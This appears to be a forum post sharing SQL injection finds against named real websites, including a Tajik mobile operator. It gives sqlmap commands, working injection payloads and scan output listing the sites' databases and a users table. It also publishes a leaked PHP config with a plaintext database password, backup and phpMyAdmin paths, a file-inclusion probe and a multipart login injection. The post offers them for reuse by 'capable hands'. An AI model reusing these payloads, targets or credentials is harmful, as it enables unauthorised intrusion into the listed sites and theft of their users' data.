Interesting SQL inj & XSS finds

GET /search/video/?s=%5c HTTP/1.1
Referer: https://www.zootubex.tv/
Cookie: ASPro_e6d47c9026=78f70446c1cf0c8919e06d90cfade07a; orientation=1
Host: www.zootubex.tv
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

I saw this was needed in the thread threads/32841, so I decided to share.
 
GET /category/live?tag=Libra HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: https://www.ccvalue.cn/
Cookie: PHPSESSID=3g7re6apuf232r45ejd6f46eue
Host: www.ccvalue.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*



Parameter: tag (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: tag=Libra' AND 2728=2728-- Krvv

Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: tag=Libra' AND GTID_SUBSET(CONCAT(0x7162717171,(SELECT (ELT(8951=8951,1))),0x7170627a71),8951)-- PaVD

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: tag=Libra' AND (SELECT 1201 FROM (SELECT(SLEEP(5)))JesI)-- cxXt
---
[01:37:03] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[01:37:03] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 7.1.33
back-end DBMS: MySQL >= 5.6

available databases [6]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] sys
[*] tanlian_prod
[*] tanlian_test
 
sqlmap --url "https://smoservice.media/bitrix/components/skyweb24/popup.pro/ajax.php?popupId=1*&type=getHTML" --random-agent --threads=10 --batch --dbs
Code:
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: https://smoservice.media:443/bitrix/components/skyweb24/popup.pro/ajax.php?popupId=1 RLIKE (SELECT (CASE WHEN (4923=4923) THEN 1 ELSE 0x28 END))&type=getHTML

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: https://smoservice.media:443/bitrix/components/skyweb24/popup.pro/ajax.php?popupId=1 AND (SELECT 5531 FROM(SELECT COUNT(*),CONCAT(0x717a6a6a71,(SELECT (ELT(5531=5531,1))),0x7176767071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)&type=getHTML

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: https://smoservice.media:443/bitrix/components/skyweb24/popup.pro/ajax.php?popupId=1 AND SLEEP(5)&type=getHTML
---
web application technology: PHP 7.2.31, Nginx 1.16.1
back-end DBMS: MySQL >= 5.0
available databases [2]:
[*] dbsmoservice
[*] information_schema
 
Code:
 --url "https://tiktopers.ru/go?id=*&type=tiktok"  --random-agent   --threads=10  --batch --dbs
Parameter: #1* (URI)
Type: error-based
Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)
Payload: https://tiktopers.ru:443/go?id=-2420 OR 1 GROUP BY CONCAT(0x716a7a7671,(SELECT (CASE WHEN (3787=3787) THEN 1 ELSE 0 END)),0x7176787071,FLOOR(RAND(0)*2)) HAVING MIN(0)#&type=tiktok

Type: UNION query
Title: MySQL UNION query (random number) - 6 columns
Payload: https://tiktopers.ru:443/go?id=-3492 UNION ALL SELECT 9179,9179,9179,CONCAT(0x716a7a7671,0x6e6a59557666644248574c75504772437576666e79776269766153586b5643796d636d68584f6e45,0x7176787071),9179,9179#&type=tiktok
---
[16:13:10] [INFO] the back-end DBMS is MySQL
web application technology: Nginx
back-end DBMS: MySQL >= 5.0.12
[16:13:10] [INFO] fetching database names
[16:13:10] [INFO] used SQL query returns 2 entries
[16:13:10] [INFO] resumed: 'information_schema'
[16:13:10] [INFO] resumed: 'tiktoper_ru'
 
--url "https://www.starhit.ru/hudeem2013/index.php?r=site/index&user=blog_user*" --random-agent --threads=10 --batch --dbs
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: https://www.starhit.ru:443/hudeem2013/index.php?r=site/index&user=blog_user') AND 6874=6874 AND ('wwEa'='wwEa

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: https://www.starhit.ru:443/hudeem2013/index.php?r=site/index&user=blog_user') AND (SELECT 9465 FROM(SELECT COUNT(*),CONCAT(0x7171787171,(SELECT (ELT(9465=9465,1))),0x7162766b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ('AAuK'='AAuK

Type: stacked queries
Title: MySQL > 5.0.11 stacked queries (comment)
Payload: https://www.starhit.ru:443/hudeem2013/index.php?r=site/index&user=blog_user');SELECT SLEEP(5)#

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: https://www.starhit.ru:443/hudeem2013/index.php?r=site/index&user=blog_user') AND SLEEP(5) AND ('tWat'='tWat

Type: UNION query
Title: Generic UNION query (NULL) - 19 columns
Payload: https://www.starhit.ru:443/hudeem2013/index.php?r=site/index&user=blog_user') UNION ALL SELECT CONCAT(0x7171787171,0x464a62516179506e6b4c69427847784a595845626165487270454e484d44766e42485a536c4d6b48,0x7162766b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- BrdZ
---
web server operating system: Linux Ubuntu
web application technology: Nginx 1.10.3, PHP 5.3.10
back-end DBMS: MySQL >= 5.0
available databases [3]:
[*] information_schema
[*] starhit_hudeem
[*] test
 
--url "https://5-apps.ru/engine/inc/extracloud/ajax/file.php*" --data="&action=check-yd-link&id=*" --random-agent --threads=10 --batch --dbs
Code:
    Type: error-based
    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: &action=check-yd-link&id=' AND EXTRACTVALUE(5323,CONCAT(0x5c,0x7171717671,(SELECT (ELT(5323=5323,1))),0x7162717871))-- TCnn

available databases [2]:
[*] 5apps
[*] information_schema
 
The largest mobile operator in Tajikistan.
---
Parameter: #1* (URI)
Type: UNION query
Title: Generic UNION query (NULL) - 2 columns
Payload: http://babilon-m.tj:80/tj/tarif.php?id=1' UNION ALL SELECT CONCAT(0x71706b7171,0x61646354444c4c6374504f6e475a6b436547546845527a70646a4b584d5152776674516a56524a51,0x716a7a7071),NULL-- SwnI
---
available databases [3]:
[*] bm
[*] information_schema
[*] test

Users
Code:
Database: bm
Table: users
[54 entries]
 
http://pribory-spb.ru/backup.sql
http://pribory-spb.ru/pma4.0.4.1light222/
PHP:
<?php
$conf[0] = $conf[1] =  array( "hostname"     => 'localhost',
                              "username"     => 'jail_priboryspb',
                              "password"     => 'vGzOnUo9sEnu',
                              "database"     => 'priborydb',
                              "tableprefix"  => 'pribory_',
                              "charset"      => 'cp1251',
                              "subfolder"    => '',
                              "debug"        => 0
                            );
$conf[1]['tableprefix'] = 'priborya_';
 
Not SQL, but also very interesting.
Put Burp in capable hands and everything will work out.

URL:http://nowa.cc/cometchat/cometchatcss.php
Parameter: cc_theme
Cookie input cc_theme was set to http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
Pattern found:Failed opening '/ssd/htdocs/cometchat/themes/http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg/css/cometchat.css' for inclusion
GET /cometchat/cometchatcss.php HTTP/1.1
Referer: https://www.google.com/search?hl=en&q=testing
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4298.0 Safari/537.36
Cookie: tplastvisit=1625409988;tplastactivity=0;top100_id=t1.1755606.1299008313.1625410009686;last_visit=1625405310160::1625416110160;ppWindowEnbl=1;vbulletin_collapse=forumbit_139%0Aforumbit_15%0Aforumbit_1%0Aforumbit_31%0Aforumbit_41%0Aforumbit_145%0Apostthanks2_5528736%0Apostthanks2_5542829%0Apostthanks2_5548575%0Apostthanks2_5548851%0Apostthanks2_5549126%0Apostthanks2_5550720%0Apostthanks2_5551268%0Apostthanks2_5566807%0Apostthanks2_5324502%0Apostthanks2_5346210%0Apostthanks2_5346837%0Apostthanks2_5346951%0Apostthanks2_5351866%0Apostthanks_5359870%0Apostthanks2_4515405%0Apostthanks2_4550873%0Apostthanks2_4618163%0Apostthanks2_4618191%0Apostthanks2_4653105%0Apostthanks2_4676336%0Apostthanks2_5029482%0Apostthanks2_5029857%0Apostthanks2_5036087%0Apostthanks2_5036895%0Apostthanks2_5037716%0Apostthanks2_100696%0Apostthanks2_3081198%0Apostthanks2_3105813%0Apostthanks2_3130840%0Apostthanks2_3149932%0Apostthanks2_3154934%0Apostthanks2_3155662;tplanguageid=72;tpforum_view=5a0b0dc75f693ba00a658098944721bd911facf5a-1-%7Bi-139_i-1625412074_%7D;tppda=1;cc_theme=http://some-inexistent-website.acu/...:1:{i:0;s:1:"1";};tpiskrsearchkeywordscount=1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: nowa.cc
Connection: Keep-alive
 
Parameter: MULTIPART uname ((custom) POST)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: -------AcunetixBoundary_IEHOMMKPYJ
Content-Disposition: form-data; name="login"


-------AcunetixBoundary_IEHOMMKPYJ
Content-Disposition: form-data; name="password"

g00dPa$$w0rD
-------AcunetixBoundary_IEHOMMKPYJ
Content-Disposition: form-data; name="uname"

1'"" AND (SELECT 8209 FROM(SELECT COUNT(*),CONCAT(0x716b6b6a71,(SELECT (ELT(8209=8209,1))),0x716a6b7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- KAGp
-------AcunetixBoundary_IEHOMMKPYJ--

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: -------AcunetixBoundary_IEHOMMKPYJ
Content-Disposition: form-data; name="login"


-------AcunetixBoundary_IEHOMMKPYJ
Content-Disposition: form-data; name="password"

g00dPa$$w0rD
-------AcunetixBoundary_IEHOMMKPYJ
Content-Disposition: form-data; name="uname"

1'"" AND (SELECT 3125 FROM (SELECT(SLEEP(5)))jowA)-- WHYr
-------AcunetixBoundary_IEHOMMKPYJ--
---
[14:53:25] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[14:53:25] [INFO] the back-end DBMS is MySQL
web application technology: LiteSpeed, PHP 5.6.40
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[14:53:28] [INFO] fetching database names
[14:53:28] [INFO] starting 2 threads
[14:53:29] [INFO] retrieved: 'information_schema'
[14:53:29] [INFO] retrieved: 'u117317841_db'
available databases [2]:
[*] information_schema
[*] u117317841_db
 
Code:
https://shumoff.biz/depho/search?search_str=1%22%27
Well, you get the idea. Everything is there; the main thing is capable hands.
 